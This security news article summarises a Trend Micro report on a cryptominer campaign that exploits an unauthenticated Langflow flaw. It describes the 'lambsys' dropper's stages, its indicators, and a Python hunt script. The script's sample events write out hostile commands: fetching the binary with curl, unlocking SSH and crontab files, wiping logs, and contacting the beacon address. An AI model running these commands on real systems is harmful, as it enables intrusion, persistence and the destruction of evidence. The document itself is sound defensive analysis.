"In this campaign, a single line of Python code evaluated inside an unauthenticated Langflow API endpoint pulls down a shell script, fetches a miner binary, and launches it detached," Trend Micro researchers Simon Dulude and John Zhang said in a technical report published last week.
CVE-2026-33017 and the March–April campaign
Threat actors weaponized CVE-2026-33017 — an unauthenticated remote code execution vulnerability in Langflow rated CVSS 9.3 — to deliver a Monero cryptocurrency miner to exposed AI application endpoints. Trend Micro observed the activity over a 19-day window between March 27 and April 15, 2026. The abuse relied on invoking an unauthenticated Langflow API endpoint to execute a single line of attacker-controlled Python that pulled down and executed a remotely hosted shell script.
How the dropper and "lambsys" binary operate
The shell script acted as a dropper whose primary task was to determine whether an ELF binary named "lambsys" was already running. If not present, the dropper fetched the binary using curl or wget and launched it as a detached process. The "lambsys" executable is written in Go and was observed performing several stages: disabling host controls, terminating competing miners, wiping traces, establishing persistence via cron, and fetching a TAR archive that contained a bespoke XMRig miner which the binary then executed and removed.
Persistence, evasion, and lateral movement
The binary attempts to disable multiple host security mechanisms, including AppArmor, Ubuntu's Uncomplicated Firewall, iptables, SELinux, the kernel NMI watchdog, and Alibaba Cloud's Aliyun agent, before applying operational changes. It issues a cascade of short-lived shell subprocesses — a design that Trend Micro summarized as trading "stealth for reliability" by isolating individual commands so failures do not abort the whole sequence. The malware also removes system logs and manipulates file attributes: it removes the immutable attribute from files and directories such as "~/.ssh/," "~/.ssh/authorized_keys," "/etc/crontab," and "/etc/ld.so.preload," makes changes, and then reapplies the immutable flag to "/tmp/" and "/var/tmp/."
Lateral spread, operational telemetry, and pool selection
Once running, the binary spreads to other systems by reusing SSH keys available on the compromised host, effectively turning a single exposed Langflow instance into a broader pathway for compromise. It also reaches out to external services for operational decision-making: the malware beacons to an external server at 83.142.209[.]214:80 and requests ipinfo[.]io to obtain the host's public IP and location. Trend Micro noted two operational uses for that geolocation: selecting a nearby mining pool to reduce latency and maximize hash rate, and geo-fencing to exclude victims in particular regions.
What this means for technologists, enterprises, and cryptominer operators
- Technologists and security teams: watch for indicators tied to the lambsys binary, the use of one-line Python evaluations against unauthenticated Langflow endpoints, and outbound connections to 83.142.209[.]214:80 and ipinfo[.]io. The observed sequence includes pkill commands against competing miners, chattr +i usage to protect malicious files, cron-based persistence, and removal of system logs — specific behaviors security tooling can monitor for.
- Affected enterprises and procurement leaders: exposed AI application endpoints running Langflow present a new front door into networks. Trend Micro emphasized that although the payload is recognizable, "the delivery vector is not," and noted prior exploitation of Langflow vulnerabilities — including CVE-2025-3248 used in June 2025 to distribute the Flodrix botnet — underscoring the risk of unpatched or internet-facing AI app infrastructure.
- Adversaries and cryptominer operators: the campaign shows active iteration. Trend Micro found an earlier artifact of this binary compiled in May 2024, indicating the operator has been developing the family for over two years and adapting it to evade detection and remove rival mining operations.
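The behaviours listed above translate directly into hunt rules. The following is an added detection example, not code from Trend Micro or from the campaign: it runs regex rules for the reported stages (fetch of "lambsys", chattr -i on protected paths, chattr +i on /tmp, pkill of rival miners, cron persistence, log removal, the beacon address and the ipinfo lookup) over a constructed set of process-start command lines and counts how many distinct stages appear, treating several together as a lambsys-like chain. The sample events and the placeholder download host are constructed; the threshold is an assumption.

```python
import re

# Constructed sample process-start events (one command line each), modelled on the
# stages in the report. Not real telemetry; the download host is a placeholder.
SAMPLE_EVENTS = [
    "curl -s http://example.invalid/lambsys -o /tmp/lambsys",
    "chattr -i /root/.ssh/authorized_keys",
    "pkill -9 xmrig",
    "rm -rf /var/log/syslog",
    "crontab -",
    "chattr +i /tmp/",
    "curl http://83.142.209.214:80/",
    "ls -la /home/app",  # benign control line
]

# (tag, pattern). Tags name the stages described in the report. Paths and the
# beacon address are those given there; pkill alone is a weak signal.
RULES = [
    ("fetch_lambsys", re.compile(r"\b(curl|wget)\b.*\blambsys\b")),
    ("unlock_protected_path",
     re.compile(r"\bchattr\s+-i\b.*(\.ssh|/etc/crontab|/etc/ld\.so\.preload)")),
    ("lock_tmp", re.compile(r"\bchattr\s+\+i\b.*(/tmp/|/var/tmp/)")),
    ("kill_rival_miner", re.compile(r"\bpkill\b")),
    ("cron_persistence", re.compile(r"\bcrontab\b|/etc/crontab")),
    ("log_wipe", re.compile(r"\brm\b.*/var/log")),
    ("c2_beacon", re.compile(r"\b83\.142\.209\.214\b")),
    ("geo_lookup", re.compile(r"\bipinfo\.io\b")),
]


def classify(event):
    """Return the set of stage tags whose rule matches one command line."""
    return {tag for tag, rx in RULES if rx.search(event)}


def hunt(events):
    """Map each matched stage tag to the command lines that triggered it."""
    hits = {}
    for ev in events:
        for tag in classify(ev):
            hits.setdefault(tag, []).append(ev)
    return hits


def is_lambsys_like(hits, minimum=3):
    """Assumed threshold: three or more distinct stages on one host is a chain."""
    return len(hits) >= minimum


if __name__ == "__main__":
    found = hunt(SAMPLE_EVENTS)
    for tag, lines in found.items():
        print(tag, "<-", lines)
    print("lambsys-like chain:", is_lambsys_like(found))
```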
Trend Micro's assessment is blunt: "This cryptocurrency-mining campaign shows how exposed AI application endpoints are becoming another route into enterprise environments." The combination of a high-severity unauthenticated RCE, straightforward remote fetch-and-execute payloads, and an emphasis on both persistence and lateral movement turns Langflow exposures into a strategic foothold for commodity cryptomining operators. As defenders review Langflow instances and related telemetry, the campaign underscores that AI-focused infrastructure can be a vector even when the ultimate payload is a familiar miner.